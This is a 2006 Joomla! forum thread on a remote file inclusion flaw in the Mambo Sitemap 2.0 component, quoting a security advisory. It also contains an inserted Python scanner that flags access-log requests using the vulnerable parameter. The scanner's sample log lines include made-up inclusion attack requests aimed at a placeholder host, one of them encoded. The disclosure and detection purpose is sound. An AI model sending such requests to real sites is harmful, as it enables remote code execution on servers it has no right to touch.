The Joomla! Forum ™





Posted: Wed Jul 12, 2006 3:10 pm
Joomla! Explorer

Joined: Fri Aug 19, 2005 12:51 pm
Posts: 427
Location: Argentina
Quote:
Author : Matdhule
Contact : matdhule@gmail.com
Application : Sitemap 2.0.0 for Mambo 4.5.1 CMS
Version : Sitemap 2.0.0
Download : http://mamboxchange.com/frs/download.ph ... emap20.zip


Have a nice day
Gustavo

_________________
Comunidad Joomla: Maintenance, support, translation and distribution for the Joomla!. Help site online. Member of the Spanish [es_ES] Joomla Translation Team. http://comunidadjoomla.org


Last edited by RobS on Sun Jul 23, 2006 8:06 pm, edited 1 time in total.

Posted: Wed Jul 12, 2006 3:55 pm
Joomla! Explorer

Joined: Thu Aug 18, 2005 8:54 pm
Posts: 374
Apparently also joommap 2.05 has this construct (vulnerability yet unconfirmed)

No, everything seems clean in joommap 2.0.5.

I can however confirm the issue with sitemap 2.0.0


Last edited by Anonymous on Wed Jul 12, 2006 4:18 pm, edited 1 time in total.

Posted: Fri Jul 14, 2006 12:56 pm
Joomla! Explorer

Joined: Fri Aug 19, 2005 12:51 pm
Posts: 427
Location: Argentina
And two days after, the official report on security-related sites...

Quote:
Advisory ID : FrSIRT/ADV-2006-2803
CVE ID : GENERIC-MAP-NOMATCH
Rated as : High Risk
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-07-14

Technical Description

A vulnerability has been identified in SiteMap (component for Mambo), which may be exploited by attackers to execute arbitrary commands. This flaw is due to an input validation error in the "sitemap.xml.php" script that fails to validate the "mosConfig_absolute_path" parameter, which could be exploited by remote attackers to include malicious files and execute arbitrary commands with the privileges of the web server.

Affected Products

SiteMap (component for Mambo) version 2.0 and prior


http://www.frsirt.com/english/advisories/2006/2803

Have a nice day
Gustavo

_________________
Comunidad Joomla: Maintenance, support, translation and distribution for the Joomla!. Help site online. Member of the Spanish [es_ES] Joomla Translation Team. http://comunidadjoomla.org
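
The following added example, which is not from the thread or the advisory, flags web access-log requests that supply the `mosConfig_absolute_path` parameter named in the advisory and separates values pointing off-host from other values. The log lines, the `/PLACEHOLDER/` path, the `files.example` host and the function names are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter named in the advisory. It is a server-side configuration value,
# so any request that supplies it deserves a look.
PARAM = "mosconfig_absolute_path"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Value that points off-host: "scheme://..." or protocol-relative "//host".
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)

def classify(line):
    """Return (script, verdict) for one access-log line, or None if clean."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    script = target.path.rsplit("/", 1)[-1]
    verdict = None
    # parse_qsl percent-decodes names and values once.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        # Compare case-insensitively and ignore an array suffix such as "[]".
        if name.split("[", 1)[0].lower() != PARAM:
            continue
        if REMOTE_RE.match(value):
            return (script, "remote-include")
        verdict = "param-supplied"
    return (script, verdict) if verdict else None

def scan(lines):
    """Return (line_number, script, verdict) for every flagged line."""
    return [(n, *hit) for n, line in enumerate(lines, 1) if (hit := classify(line))]

# Constructed sample lines (combined log format); hosts and paths are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Jul/2006:10:01:00 +0000] "GET /index.php?page=2 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [14/Jul/2006:10:02:11 +0000] "GET /PLACEHOLDER/sitemap.xml.php?mosConfig_absolute_path=http://files.example/ HTTP/1.1" 200 312',
    '192.0.2.44 - - [14/Jul/2006:10:02:15 +0000] "GET /PLACEHOLDER/sitemap.xml.php?mosConfig_absolute_path=%68ttp%3A%2F%2Ffiles.example%2F HTTP/1.0" 200 312',
    '192.0.2.51 - - [14/Jul/2006:10:03:40 +0000] "GET /PLACEHOLDER/sitemap.xml.php?mosConfig_absolute_path=/tmp HTTP/1.1" 200 98',
    '192.0.2.10 - - [14/Jul/2006:10:04:02 +0000] "GET /PLACEHOLDER/sitemap.xml.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for n, script, verdict in scan(SAMPLE_LOG):
        print(f"line {n}: {script}: {verdict}")
```

The check reads only the request line of each log entry, so it covers what the access log records and nothing sent in a request body.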


Posted: Fri Jul 21, 2006 11:58 am
Joomla! Champion

Joined: Fri Aug 12, 2005 12:47 am
Posts: 6569
The sitemap 2.0 component is not actively maintained and should not be used on any production websites! The component has been removed from mamboforge.

_________________
Johan Janssens - Joomla Co-Founder, Lead Developer of Joomla 1.5

http://www.joomlatools.com - Joomla extensions that just work


Last edited by Jinx on Fri Jul 21, 2006 12:00 pm, edited 1 time in total.
